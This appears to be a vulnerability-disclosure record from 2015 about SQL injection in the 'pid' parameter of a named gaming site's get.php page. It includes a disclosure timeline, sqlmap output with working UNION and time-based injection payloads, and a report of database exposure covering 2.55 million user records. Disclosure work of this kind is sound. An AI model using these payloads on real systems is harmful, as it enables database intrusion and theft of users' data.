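2015-05-05: Details reported to the vendor; awaiting vendor response
2015-05-05: Vendor has confirmed; details disclosed only to the vendor
2015-05-15: Details disclosed to core white hats and relevant domain experts
2015-05-25: Details disclosed to regular white hats
2015-06-04: Details disclosed to intern white hats
2015-06-19: Details disclosed to the public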
http://web.7k7k.com/codes/get.php?pid=1
SQL injection is present.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pid
    Type: UNION query
    Title: MySQL UNION query (NULL) - 15 columns
    Payload: pid=-5775 UNION ALL SELECT CONCAT(0x7175766771,0x4d51425a564641485579,0x7176776f71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: pid=1 AND SLEEP(5)
---
web application technology: Apache, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
Database: web7k
[299 tables]
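2.55 million user records
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-05-05 16:10
Thanks to the white hat for the report. The relevant technical staff have been notified to handle it.
None yet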